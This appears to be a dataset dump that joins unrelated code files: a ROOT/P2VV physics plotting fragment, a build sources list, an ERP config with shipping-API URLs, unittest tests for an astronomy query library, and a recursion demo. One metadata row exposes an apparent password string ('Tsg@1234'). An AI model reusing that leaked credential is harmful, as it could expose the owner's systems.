from P2VV.RooFitWrappers import HistPdf
tagPdfOS = HistPdf( Name = 'sig_bkg_estWTagOS'
, Observables = [ estWTagOS ]
, Binning = { estWTagOS : numEstWTagBins }
, Data = taggedDataOS
)
tagPdfSS = HistPdf( Name = 'sig_bkg_estWTagSS'
, Observables = [ estWTagSS ]
, Binning = { estWTagSS : numEstWTagBins }
, Data = taggedDataSS
)
# get normalization correction for tagged events
untagFracOS = fullData.table(tagCatOS).getFrac('Untagged')
untagFracSigOS = sigData.table(tagCatOS).getFrac('Untagged')
untagFracBkgOS = cbkgData.table(tagCatOS).getFrac('Untagged')
untagFracSS = fullData.table(tagCatSS).getFrac('Untagged')
untagFracSigSS = sigData.table(tagCatSS).getFrac('Untagged')
untagFracBkgSS = cbkgData.table(tagCatSS).getFrac('Untagged')
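# The (1 - untagged fraction) factors computed above are used below to
# normalize PDFs that are defined for tagged events only.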
# plot estimated wrong-tag probabilities for signal and for background
from ROOT import gStyle
gStyle.SetColorModelPS(1)
from P2VV.Load import LHCbStyle
from P2VV.Utilities.Plotting import plot
from ROOT import TCanvas, kBlue, kFullDotLarge
canvsOS = [ TCanvas( 'estWTagCanvOS%d' % it ) for it in range(3) ]
for ( canv, data, nBins, norm ) in zip( canvsOS
, [ fullData, sigData, cbkgData ]
, 3 * [ numEstWTagBins ]
, [ 1. - untagFracOS, 1. - untagFracSigOS, 1. - untagFracBkgOS ]
) :
canv.SetLeftMargin(0.18)
canv.SetRightMargin(0.05)
canv.SetBottomMargin(0.18)
canv.SetTopMargin(0.05)
#plot( canv, estWTagOS, data, tagPdfOS
plot( canv, estWTagOS, data, yScale = ( 0., None ), xTitleOffset = 1.10, yTitleOffset = 1.15
, xTitle = '#eta^{OS}'
, yTitle = 'Candidates / %.2f' % ( 0.499999 / float(nBins) )
, frameOpts = dict( Bins = nBins, Range = ( 0., 0.499999 ), Name = estWTagOS.GetName() )
, dataOpts = dict( MarkerStyle = kFullDotLarge, MarkerSize = 0.7, LineWidth = 3 )
#, pdfOpts = dict( LineColor = kBlue, LineWidth = 3, Normalization = norm )
)
canvsSS = [ TCanvas( 'estWTagCanvSS%d' % it ) for it in range(3) ]
for ( canv, data, nBins, norm ) in zip( canvsSS
, [ fullData, sigData, cbkgData ]
, 3 * [ numEstWTagBins ]
, [ 1. - untagFracSS, 1. - untagFracSigSS, 1. - untagFracBkgSS ]
) :
canv.SetLeftMargin(0.18)
canv.SetRightMargin(0.05)
canv.SetBottomMargin(0.18)
canv.SetTopMargin(0.05)
#plot( canv, estWTagSS, data, tagPdfSS
plot( canv, estWTagSS, data, yScale = ( 0., None ), xTitleOffset = 1.10, yTitleOffset = 1.15
, xTitle = '#eta^{SSK}'
, yTitle = 'Candidates / %.2f' % ( 0.499999 / float(nBins) )
, frameOpts = dict( Bins = nBins, Range = ( 0., 0.499999 ), Name = estWTagSS.GetName() )
, dataOpts = dict( MarkerStyle = kFullDotLarge, MarkerSize = 0.7, LineWidth = 3 )
#, pdfOpts = dict( LineColor = kBlue, LineWidth = 3, Normalization = norm )
)
for it, canv in enumerate( canvsOS + canvsSS ) :
canv.Print( plotsFilePath + ( '(' if it == 0 else ')' if it == len( canvsOS + canvsSS ) - 1 else '' ) )
# #TODO: Make it available in the case of cFit
# if AllTagPlots:
# self._estWTagCanvSS_B = TCanvas('estWTagCanvSS_B' , 'Est. wrong-tag probability SS, B' )
# self._estWTagCanvSS_Bbar = TCanvas( 'estWTagCanvSS_Bbar','Est. wrong-tag probability SS, Bbar')
# self._estWTagCanvOS_B = TCanvas( 'estWTagCanvOS_B' ,'Est. wrong-tag probability OS, B' )
# self._estWTagCanvOS_Bbar = TCanvas( 'estWTagCanv0S_Bbar','Est. wrong-tag probability OS, Bbar')
#
# self._estWTagCanvSSOS_B = TCanvas( 'estWTagCanvSSOS_B' , 'Est. wrong-tag probability SS+OS, B' )
# self._estWTagCanvSSOS_Bbar = TCanvas( 'estWTagCanvSS0S_Bbar' , 'Est. wrong-tag probability SS+OS, Bbar' )
# self._estWTagCanvSSOS_BbarB = TCanvas( 'estWTagCanvSS0S_BbarB', 'Est. wrong-tag probability SS+OS, BbarB')
#
# tagCutSS_B = 'tagdecision_ss==tagdecision_ss::B'
# tagCutSS_Bbar = 'tagdecision_ss==tagdecision_ss::Bbar'
# tagCutOS_B = 'tagdecision_os==tagdecision_os::B'
# tagCutOS_Bbar = 'tagdecision_os==tagdecision_os::Bbar'
#
# tagCutComb_B = 'tagdecision==tagdecision::B'
# tagCutComb_Bbar = 'tagdecision==tagdecision::Bbar'
# tagCutComb_BbarB = tagCutComb_B + '|' + tagCutComb_Bbar
#
# for ( pad, data, nBins, BorBbar, titleX, obs )\
# in zip( [ self._estWTagCanvSS_B , self._estWTagCanvSS_Bbar,
# self._estWTagCanvOS_B , self._estWTagCanvOS_Bbar,
# self._estWTagCanvSSOS_B, self._estWTagCanvSSOS_Bbar,
# self._estWTagCanvSSOS_BbarB ]
#
# , [ sigData.reduce(tagCutSS_B ),
# sigData.reduce(tagCutSS_Bbar ),
# sigData.reduce(tagCutOS_B ),
# sigData.reduce(tagCutOS_Bbar ),
# sigData.reduce(tagCutComb_B ),
# sigData.reduce(tagCutComb_Bbar ),
# sigData.reduce(tagCutComb_BbarB) ]
#
# , 7 * [ numEstWTagBins ]
# , 3 * [ 'B', 'Bbar' ] + [ 'BbarB' ]
# , 2 * [ '#eta^{SS}' ] + 2 * [ '#eta^{OS}'] + 3 * [ '#eta^{SS+OS}']
# , 2 * [ estWTagSS ] + 2 * [ estWTagOS ] + 3 * [ estWTagComb ]
# ) :
# plot( pad, obs , data
# , xTitle = titleX
# , yScale = [0, None]
# , frameOpts = dict( Bins = nBins, Title = obs.GetTitle() + BorBbar, Range = ( 0., 0.499999 )
# , Name = obs.GetName() + BorBbar )
# , dataOpts = dict( MarkerStyle = 8, MarkerSize = 0.4 )
# , pdfOpts = dict( LineColor = kBlue, LineWidth = 3 )
# )
# === /src/alloy/tracing/channels/sources.gypi (repo: wtfaremyinitials/xenia) ===
# Copyright 2013 Ben Vanik. All Rights Reserved.
{
'sources': [
'file_channel.cc',
'file_channel.h',
],
}
# === /address_old/app/config.py (repo: khanh-trieu/folder-erp-lap-tsg) ===
API_GET_PROVINCE = 'https://api.mysupership.vn/v1/partner/areas/province'
API_GET_DISTRICT = 'https://api.mysupership.vn/v1/partner/areas/district?province='
API_GET_WARD = 'https://api.mysupership.vn/v1/partner/areas/commune?district='
MSG_SUCCESS = 'Thành công!' | [
"Tsg@1234"
] | Tsg@1234 |
8b21e646fd26e249fa7cc2a641e4665b65831e68 | 0308ca5b152a082c1a206a1a136fd45e79b48143 | /usvao/prototype/vaopy/tickets/VAOPD-892/tests/dal/testQueryNoNet.py | 3feb0711d89be9813fcef7ab72cdca7914c90cad | [] | no_license | Schwarzam/usvirtualobservatory | b609bf21a09c187b70e311a4c857516284049c31 | 53fe6c14cc9312d048326acfa25377e3eac59858 | refs/heads/master | 2022-03-28T23:38:58.847018 | 2019-11-27T16:05:47 | 2019-11-27T16:05:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,204 | py | #!/usr/bin/env python
"""
Tests for vaopy.dal.query
"""
import os, sys, shutil, re, imp, glob
import unittest, pdb
from urllib2 import URLError, HTTPError
import vaopy.dal.query as dalq
import vaopy.dal.dbapi2 as daldbapi
# from astropy.io.vo import parse as votableparse
from astropy.io.votable.tree import VOTableFile
from vaopy.dal.query import _votableparse as votableparse
testdir = os.path.dirname(sys.argv[0])
if not testdir: testdir = "tests"
siaresultfile = "neat-sia.xml"
ssaresultfile = "jhu-ssa.xml"
testserverport = 8081
try:
t = "aTestSIAServer"
mod = imp.find_module(t, [testdir])
testserver = imp.load_module(t, mod[0], mod[1], mod[2])
testserver.testdir = testdir
except ImportError, e:
print >> sys.stderr, "Can't find test server: aTestSIAServer.py:", str(e)
class DALAccessErrorTest(unittest.TestCase):
msg = "nya-nya"
url = "http://localhost"
def testProperties2(self):
e = dalq.DALAccessError(self.msg, self.url)
self.assertEquals(self.msg, e.reason)
self.assertEquals(self.url, e.url)
e.reason = "poof"
self.assertEquals("poof", e.reason)
del e.reason
self.assertEquals(dalq.DALAccessError._defreason, e.reason)
def testProperties1(self):
e = dalq.DALAccessError(self.msg)
self.assertEquals(self.msg, e.reason)
self.assert_(e.url is None)
def testPropertiesDef(self):
e = dalq.DALAccessError()
self.assertEquals(dalq.DALAccessError._defreason, e.reason)
self.assert_(e.url is None)
class DALServiceErrorTest(unittest.TestCase):
msg = "nya-nya"
code = 404
url = "http://localhost/"
def testProperties4(self):
c = HTTPError("http://localhost/", self.code, self.msg, None, None)
e = dalq.DALServiceError(self.msg, self.code, c, self.url)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assertEquals(self.code, e.code)
self.assertEquals(self.url, e.url)
del e.cause
self.assert_(e.cause is None)
e.cause = c
self.assert_(e.cause is c)
e.code = 505
self.assertEquals(505, e.code)
del e.code
self.assert_(e.code is None)
def testProperties3(self):
c = HTTPError("http://localhost/", self.code, self.msg, None, None)
e = dalq.DALServiceError(self.msg, self.code, c)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assertEquals(self.code, e.code)
self.assert_(e.url is None)
def testProperties2(self):
e = dalq.DALServiceError(self.msg, self.code)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is None)
self.assertEquals(self.code, e.code)
self.assert_(e.url is None)
def testProperties1(self):
e = dalq.DALServiceError(self.msg)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is None)
self.assert_(e.code is None)
self.assert_(e.url is None)
def testPropertiesDef(self):
e = dalq.DALServiceError()
self.assert_(e.reason and e.reason.startswith("Unknown service "))
self.assert_(e.cause is None)
self.assert_(e.code is None)
self.assert_(e.url is None)
def testFromExceptHTTP(self):
url = "http://localhost/"
c = HTTPError(url, self.code, self.msg, None, None)
e = dalq.DALServiceError.from_except(c)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assertEquals(self.code, e.code)
self.assertEquals(url, e.url)
def testFromExceptURL(self):
url = "http://localhost/"
c = URLError(self.msg)
e = dalq.DALServiceError.from_except(c, url)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assert_(e.code is None)
self.assertEquals(url, e.url)
def testFromExcept(self):
c = RuntimeError(self.msg)
e = dalq.DALServiceError.from_except(c)
self.assertEquals(e.reason, "RuntimeError: " + self.msg)
self.assert_(e.cause is c)
self.assert_(e.code is None)
self.assert_(e.url is None)
class DALQueryErrorTest(unittest.TestCase):
msg = "nya-nya"
label = "goofed"
def testProperties2(self):
e = dalq.DALQueryError(self.msg, self.label)
self.assertEquals(self.msg, e.reason)
self.assertEquals(self.label, e.label)
e.reason = "poof"
self.assertEquals("poof", e.reason)
e.label = "OVERFLOW"
self.assertEquals("OVERFLOW", e.label)
del e.label
self.assert_(e.label is None)
def testProperties1(self):
e = dalq.DALQueryError(self.msg)
self.assertEquals(self.msg, e.reason)
self.assert_(e.label is None)
def testPropertiesDef(self):
e = dalq.DALQueryError()
self.assert_(e.reason and e.reason.startswith("Unknown DAL Query "))
self.assert_(e.label is None)
class DALResultsTest(unittest.TestCase):
def setUp(self):
resultfile = os.path.join(testdir, siaresultfile)
self.tbl = votableparse(resultfile)
def testCtor(self):
self.result = dalq.DALResults(self.tbl)
self.assert_(isinstance(self.result._fldnames, list))
self.assert_(self.result.votable is not None)
def testProps(self):
self.testCtor()
self.assertEquals(self.result.nrecs, 2)
try:
self.result.nrecs = 4
self.fail("size is not read-only")
except AttributeError:
pass
names = self.result.fieldnames()
self.assert_(isinstance(names, list))
self.assertEquals(len(names), 10)
for i in xrange(len(names)):
self.assert_(isinstance(names[i], str) or
isinstance(names[i], unicode),
"field name #%d not a string: %s" % (i,type(names[i])))
self.assert_(len(names[i]) > 0, "field name #%s is empty" % i)
fd = self.result.fielddesc()
self.assert_(isinstance(fd, list))
self.assertEquals(len(fd), 10)
for fld in fd:
self.assert_(hasattr(fld,'name'))
self.assert_(hasattr(fld,'ID'))
self.assert_(hasattr(fld,'ucd'))
self.assert_(hasattr(fld,'datatype'))
for i in xrange(len(names)):
fld = self.result.getdesc(names[i])
self.assert_(fld is fd[i])
fld = self.result.getdesc("Format")
self.assertEquals(fld.name, "Format")
# self.assertEquals(fld.ID, "Format")
self.assertEquals(fld.ucd, "VOX:Image_Format")
self.assertEquals(fld.datatype, "char")
self.assertEquals(fld.arraysize, "*")
self.assert_(fld.utype is None)
def testValue(self):
self.testCtor()
self.assertEquals(self.result.getvalue("Format", 0), "image/fits")
self.assertEquals(self.result.getvalue("Format", 1), "image/jpeg")
self.assertEquals(self.result.getvalue("Dim", 0), 2)
val = self.result.getvalue("Size", 0)
self.assertEquals(len(val), 2)
self.assertEquals(val[0], 300)
self.assertEquals(val[1], 300)
self.assertRaises(ValueError, self.result.getvalue, "Goober", 0)
def testGetRecord(self):
self.testCtor()
rec = self.result.getrecord(0)
self.assert_(rec is not None)
self.assert_(isinstance(rec, dalq.Record))
rec = self.result.getrecord(1)
self.assert_(rec is not None)
self.assert_(isinstance(rec, dalq.Record))
self.assertRaises(IndexError, self.result.getrecord, 2)
def testGetColumn(self):
self.testCtor()
col = self.result.getcolumn('Ra')
shifted = col + 0.05
self.assertAlmostEquals(0.05, shifted[0]-col[0])
self.assertRaises(ValueError, self.result.getcolumn, 'goob')
def testIter(self):
self.testCtor()
i = 0
for rec in self.result:
self.assert_(rec is not None)
self.assert_(isinstance(rec, dalq.Record))
i += 1
self.assertEquals(i, 2)
def testCursor(self):
self.testCtor()
c = self.result.cursor()
self.assert_(c is not None)
self.assert_(isinstance(c, daldbapi.Cursor))
def testByUcd(self):
self.testCtor()
self.assertEquals(self.result.fieldname_with_ucd("POS_EQ_RA_MAIN"),"Ra")
self.assertEquals(self.result.fieldname_with_ucd("VOX:Image_AccessReference"),"URL")
class RecordTest(unittest.TestCase):
def setUp(self):
resultfile = os.path.join(testdir, siaresultfile)
self.tbl = votableparse(resultfile)
self.result = dalq.DALResults(self.tbl)
self.rec = self.result.getrecord(0)
def testFields(self):
fnames = self.result.fieldnames()
reckeys = self.rec.keys()
for name in fnames:
self.assert_(name in reckeys, "Missing fieldname: "+name)
def testValues(self):
self.assertEquals(self.rec["Format"], "image/fits")
self.assertEquals(self.rec["Dim"], 2)
val = self.rec["Size"]
self.assertEquals(len(val), 2)
self.assertEquals(val[0], 300)
self.assertEquals(val[1], 300)
try:
self.rec["Goober"]
self.fail("Failed to raise KeyError on bad key")
except KeyError:
pass
def testSuggestExtension(self):
self.assertEquals(self.rec.suggest_extension("goob"), "goob")
self.assert_(self.rec.suggest_extension() is None)
class EnsureBaseURLTest(unittest.TestCase):
def testFix(self):
self.assertEquals(dalq.ensure_baseurl("http://localhost")[-1], '?')
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia")[-1], '?')
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat")[-1], '&')
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&usecache=yes")[-1], '&')
self.assertEquals(dalq.ensure_baseurl("http://localhost?"),
"http://localhost?")
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?"),
"http://localhost/sia?")
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&"),
"http://localhost/sia?cat=neat&")
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&usecache=yes&"),
"http://localhost/sia?cat=neat&usecache=yes&")
class DALServiceTest(unittest.TestCase):
def setUp(self):
self.baseurl = "http://localhost/sia"
def testCtor(self):
self.res = {"title": "Archive", "shortName": "arch"}
self.srv = dalq.DALService(self.baseurl, "sga", "2.0", self.res)
def testProps(self):
self.testCtor()
self.assertEquals(self.srv.baseurl, self.baseurl)
self.assertEquals(self.srv.protocol, "sga")
self.assertEquals(self.srv.version, "2.0")
try:
self.srv.baseurl = "goober"
self.fail("baseurl not read-only")
except AttributeError:
pass
try:
self.srv.protocol = "sia"
self.fail("protocol not read-only")
except AttributeError:
pass
try:
self.srv.version = "1.0"
self.fail("version not read-only")
except AttributeError:
pass
self.assertEquals(self.srv.description["title"], "Archive")
self.assertEquals(self.srv.description["shortName"], "arch")
self.srv.description["title"] = "Sir"
self.assertEquals(self.res["title"], "Archive")
def testNoResmeta(self):
srv = dalq.DALService(self.baseurl)
self.assertEquals(srv.baseurl, self.baseurl)
self.assert_(srv.description is not None)
self.assert_(hasattr(srv.description, "get"))
self.assertEquals(len(srv.description.keys()), 0)
def testCreateQuery(self):
self.testCtor()
q = self.srv.create_query()
self.assert_(isinstance(q, dalq.DALQuery))
self.assertEquals(q.baseurl, self.baseurl)
self.assertEquals(q.protocol, self.srv.protocol)
self.assertEquals(q.version, self.srv.version)
def testCreateQueryWithKws(self):
self.testCtor()
q = self.srv.create_query(RA=12.045, DEC=-13.08, SR=0.01)
self.assert_(isinstance(q, dalq.DALQuery))
self.assertEquals(q.baseurl, self.baseurl)
self.assertEquals(q.protocol, self.srv.protocol)
self.assertEquals(q.version, self.srv.version)
self.assertAlmostEquals(q.getparam('RA'), 12.045)
self.assertAlmostEquals(q.getparam('DEC'), -13.08)
self.assertAlmostEquals(q.getparam('SR'), 0.01)
class DALQueryTest(unittest.TestCase):
def setUp(self):
self.baseurl = "http://localhost/sia"
def testCtor(self):
self.query = dalq.DALQuery(self.baseurl, "sga", "2.0")
self.assert_(self.query.getparam("format") is None)
def testProps(self):
self.testCtor()
self.assertEquals(self.query.baseurl, self.baseurl)
self.assertEquals(self.query.protocol, "sga")
self.assertEquals(self.query.version, "2.0")
self.query.baseurl = "http://gomer.net/infinite/loop?"
self.assertEquals(self.query.baseurl,
"http://gomer.net/infinite/loop?");
def testParam(self):
self.testCtor()
self.assertEquals(len(self.query.paramnames()), 0,
"param set should be empty: " +
str(self.query.paramnames()))
self.assert_(self.query.getparam("RA") is None)
self.query.setparam("RA", 51.235)
self.assertEquals(len(self.query.paramnames()), 1)
self.assertEquals(self.query.getparam("RA"), 51.235)
self.query.setparam("RA", 127.235)
self.assertEquals(len(self.query.paramnames()), 1)
self.assertEquals(self.query.getparam("RA"), 127.235)
self.query.setparam("DEC", -13.49677)
self.assertEquals(len(self.query.paramnames()), 2)
self.assertEquals(self.query.getparam("DEC"), -13.49677)
self.query.unsetparam("FORMAT")
self.assertEquals(len(self.query.paramnames()), 2)
self.query.unsetparam("RA")
self.assertEquals(len(self.query.paramnames()), 1)
self.assertEquals(self.query.getparam("DEC"), -13.49677)
self.assert_(self.query.getparam("RA") is None)
def testQueryURL(self):
self.testCtor()
self.query.setparam("RA", 51.235)
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?RA=51.235')
self.query.setparam("DEC", -13.49677)
qurl = self.query.getqueryurl()
self.assert_(qurl == self.baseurl+'?RA=51.235&DEC=-13.49677' or
qurl == self.baseurl+'?DEC=-13.49677&RA=51.235')
self.query.setparam("SR", "1.0")
qurl = self.query.getqueryurl()
self.assert_(qurl == self.baseurl+'?RA=51.235&SR=1.0&DEC=-13.49677' or
qurl == self.baseurl+'?DEC=-13.49677&SR=1.0&RA=51.235' or
qurl == self.baseurl+'?RA=51.235&DEC=-13.49677&SR=1.0' or
qurl == self.baseurl+'?DEC=-13.49677&RA=51.235&SR=1.0' or
qurl == self.baseurl+'?SR=1.0&DEC=-13.49677&RA=51.235' or
qurl == self.baseurl+'?SR=1.0&RA=51.235&DEC=-13.49677')
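        # Note (illustrative): the alternatives above exist because the
        # parameter order in the query string follows dict iteration order,
        # which was not guaranteed before Python 3.7.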
def testEncode(self):
self.testCtor()
self.query.setparam("NaMe", "a val")
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?NaMe=a+val')
self.testCtor()
self.query.setparam("NaMe", "a+val")
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?NaMe=a%2Bval')
def testEncodeList(self):
self.testCtor()
self.query.setparam("POS", (5.231, -13.441))
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?POS=5.231,-13.441')
class QueryExecuteTest(unittest.TestCase):
def setUp(self):
pass
# self.srvr = testserver.TestServer(testserverport)
# self.srvr.start()
def tearDown(self):
pass
#if self.srvr.isAlive():
# self.srvr.shutdown()
#if self.srvr.isAlive():
# print "prob"
def testExecute(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
results = q.execute()
self.assert_(isinstance(results, dalq.DALResults))
self.assertEquals(results.nrecs, 2)
def testExecuteStream(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
strm = q.execute_stream()
self.assert_(strm is not None)
self.assert_(hasattr(strm, "read"))
results = strm.read()
strm.close()
self.assert_(results.startswith("<?xml version="))
def testExecuteRaw(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
data = q.execute_raw()
self.assert_(data is not None)
self.assert_(isinstance(data, unicode) or isinstance(data, str))
self.assert_(data.startswith("<?xml version="))
def testExecuteVotable(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
results = q.execute_votable()
self.assert_(isinstance(results, VOTableFile))
def testExecuteServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
self.assertRaises(dalq.DALServiceError, q.execute)
def testExecuteRawServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
self.assertRaises(dalq.DALServiceError, q.execute_raw)
def testExecuteStreamServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
try:
q.execute_raw()
self.fail("failed to raise exception on bad url")
except dalq.DALServiceError, e:
self.assertEquals(e.code, 404)
self.assertEquals(e.reason, "Not Found")
self.assert_(isinstance(e.cause, HTTPError))
except Exception, e:
self.fail("wrong exception raised: " + str(type(e)))
def testExecuteVotableServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
self.assertRaises(dalq.DALServiceError, q.execute_votable)
def testExecuteRawQueryErr(self):
q = dalq.DALQuery("http://localhost:%d/err" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
data = q.execute_raw()
self.assert_(data is not None)
self.assert_(isinstance(data, unicode) or isinstance(data, str))
self.assert_(data.startswith("<?xml version="))
self.assert_('<INFO name="QUERY_STATUS" value="ERR' in data)
def testExecuteQueryErr(self):
q = dalq.DALQuery("http://localhost:%d/err" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
try:
q.execute()
self.fail("failed to raise exception for syntax error")
except dalq.DALQueryError, e:
self.assertEquals(e.label, "ERROR")
self.assertEquals(str(e), "Forced Fail")
except dalq.DALServiceError, e:
self.fail("wrong exception raised: DALServiceError: " + str(e))
except Exception, e:
self.fail("wrong exception raised: " + str(type(e)))
class CursorTest(unittest.TestCase):
def setUp(self):
resultfile = os.path.join(testdir, ssaresultfile)
self.tbl = votableparse(resultfile)
def testCtor(self):
self.result = dalq.DALResults(self.tbl)
self.assert_(isinstance(self.result._fldnames, list))
self.assert_(self.result.votable is not None)
self.cursor = self.result.cursor()
def testCursor(self):
self.testCtor()
self.assert_(self.cursor is not None)
self.assert_(isinstance(self.cursor, daldbapi.Cursor))
self.assertEquals(self.cursor.rowcount, 35)
self.assertEquals(self.cursor.arraysize, 1)
descr = self.cursor.description
self.assert_(len(descr) > 0)
self.assertEquals(descr[1][0], 'AcRef')
self.assert_(isinstance(descr[1][1], daldbapi.TypeObject))
def testInfos(self):
self.testCtor()
infos = self.cursor.infos()
self.assertEquals(int(infos['TableRows']), 35)
def testFetchOne(self):
self.testCtor()
pos = self.cursor.pos
rec = self.cursor.fetchone()
self.assertEquals(self.cursor.pos, pos + 1)
rec2 = self.cursor.fetchone()
# self.assert_(rec != rec2)
self.assertEquals(self.cursor.pos, pos + 2)
def testFetchMany(self):
self.testCtor()
pos = self.cursor.pos
recs = self.cursor.fetchmany()
self.assertEquals(len(recs), self.cursor.arraysize)
recs = self.cursor.fetchmany(size = 5)
self.assertEquals(len(recs), 5)
recs = self.cursor.fetchmany(size = -5)
def testFetchAll(self):
self.testCtor()
recs = self.cursor.fetchall()
self.assertEquals(len(recs), 35)
self.testCtor()
self.cursor.fetchone()
recs = self.cursor.fetchall()
self.assertEquals(len(recs), 34)
def testScroll(self):
self.testCtor()
pos = self.cursor.pos
self.cursor.scroll(5)
self.assertEquals(self.cursor.pos, pos + 5)
self.cursor.scroll(5, mode = "absolute")
self.assertEquals(self.cursor.pos, 5)
try:
self.cursor.scroll(-1, mode = "absolute")
except daldbapi.DataError:
pass
self.cursor.scroll(-1)
self.assertEquals(self.cursor.pos, 4)
class DatasetNameTest(unittest.TestCase):
base = "testds"
def setUp(self):
resultfile = os.path.join(testdir, siaresultfile)
self.tbl = votableparse(resultfile)
self.result = dalq.DALResults(self.tbl)
self.rec = self.result.getrecord(0)
self.cleanfiles()
def tearDown(self):
self.cleanfiles()
def cleanfiles(self):
files = glob.glob(os.path.join(testdir, self.base+"*.*"))
for f in files:
os.remove(f)
def testMime2Ext(self):
self.assertEquals("fits", dalq.mime2extension("application/fits"))
self.assertEquals("fits", dalq.mime2extension("image/fits"))
self.assertEquals("fits", dalq.mime2extension("image/x-fits"))
self.assertEquals("jpg", dalq.mime2extension("image/jpeg"))
self.assertEquals("gif", dalq.mime2extension("image/gif"))
self.assertEquals("png", dalq.mime2extension("image/png"))
self.assertEquals("txt", dalq.mime2extension("text/plain"))
self.assertEquals("html", dalq.mime2extension("text/html"))
self.assertEquals("xml", dalq.mime2extension("text/xml"))
self.assertEquals("xml", dalq.mime2extension("application/votable;convention=stsci"))
self.assertEquals("xml", dalq.mime2extension("application/x-votable"))
self.assertEquals("xml", dalq.mime2extension("application/votable"))
self.assertEquals("xls",
dalq.mime2extension("application/x-micrsoft-spreadsheet", "xls"))
def testSuggest(self):
self.assertEquals("dataset", self.rec.suggest_dataset_basename())
self.assertEquals("DAT", self.rec.suggest_extension("DAT"))
def testMakeDatasetName(self):
self.assertEquals("./dataset.dat", self.rec.make_dataset_filename())
self.assertEquals("./goober.dat",
self.rec.make_dataset_filename(base="goober"))
self.assertEquals("./dataset.fits",
self.rec.make_dataset_filename(ext="fits"))
self.assertEquals("./goober.fits",
self.rec.make_dataset_filename(base="goober",
ext="fits"))
self.assertEquals(testdir+"/dataset.dat",
self.rec.make_dataset_filename(testdir))
path = os.path.join(testdir,self.base+".dat")
self.assertFalse(os.path.exists(path))
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(path,'w').close()
self.assertTrue(os.path.exists(path))
path = os.path.join(testdir,self.base+"-1.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(path,'w').close()
self.assertTrue(os.path.exists(path))
path = os.path.join(testdir,self.base+"-2.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(path,'w').close()
self.assertTrue(os.path.exists(path))
path = os.path.join(testdir,self.base+"-3.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
self.cleanfiles()
open(os.path.join(testdir,self.base+".dat"),'w').close()
path = os.path.join(testdir,self.base+"-1.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
open(os.path.join(testdir,self.base+"-1.dat"),'w').close()
open(os.path.join(testdir,self.base+"-2.dat"),'w').close()
open(os.path.join(testdir,self.base+"-3.dat"),'w').close()
path = os.path.join(testdir,self.base+"-4.dat")
self.assertEquals(path,
self.rec.make_dataset_filename(testdir, self.base))
self.cleanfiles()
self.assertEquals(os.path.join(testdir,self.base+".dat"),
self.rec.make_dataset_filename(testdir, self.base))
__all__ = "DALAccessErrorTest DALServiceErrorTest DALQueryErrorTest RecordTest EnsureBaseURLTest DALServiceTest DALQueryTest QueryExecuteTest CursorTest DatasetNameTest".split()
def suite():
tests = []
for t in __all__:
tests.append(unittest.makeSuite(globals()[t]))
return unittest.TestSuite(tests)
if __name__ == "__main__":
srvr = testserver.TestServer(testserverport)
try:
srvr.start()
unittest.main()
finally:
if srvr.isAlive():
srvr.shutdown()
| [
"usvirtualobservatory@5a1e9bf7-f4d4-f7d4-5b89-e7d39643c4b5"
] | usvirtualobservatory@5a1e9bf7-f4d4-f7d4-5b89-e7d39643c4b5 |
b6d8f27ccd78ce668ead8011086bf2b955637496 | 67932bfe656c093cc306d4c9bca682140d21a470 | /loopsByRecursion.py | 06f6799b5a153b5acb0049b7e7e2968688365091 | [] | no_license | dases/recursion_examples | bb8769c0f64ef8e612660547c00693ede725f72f | 3733045157d0daf5016e0213eeace8f968203311 | refs/heads/master | 2023-07-16T05:46:51.521638 | 2021-09-01T21:27:34 | 2021-09-01T21:27:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | def theLoop(i):
if i < 4: # Stops when false.
# RECURSIVE CASE
# The main code:
print(i, 'Hello!')
theLoop(i + 1) # Increment i.
return
else:
# BASE CASE
return
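# Illustrative sketch (not part of the original file): the same loop
# written iteratively, for comparison with the recursion above.
def theLoopIterative(i):
    while i < 4:           # Same stopping condition as the base case.
        print(i, 'Hello!')
        i += 1             # Same increment as the theLoop(i + 1) call.
# theLoopIterative(0) would print the same four lines as theLoop(0) below.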
theLoop(0) # Start i at 0. | [
"[email protected]"
] | |
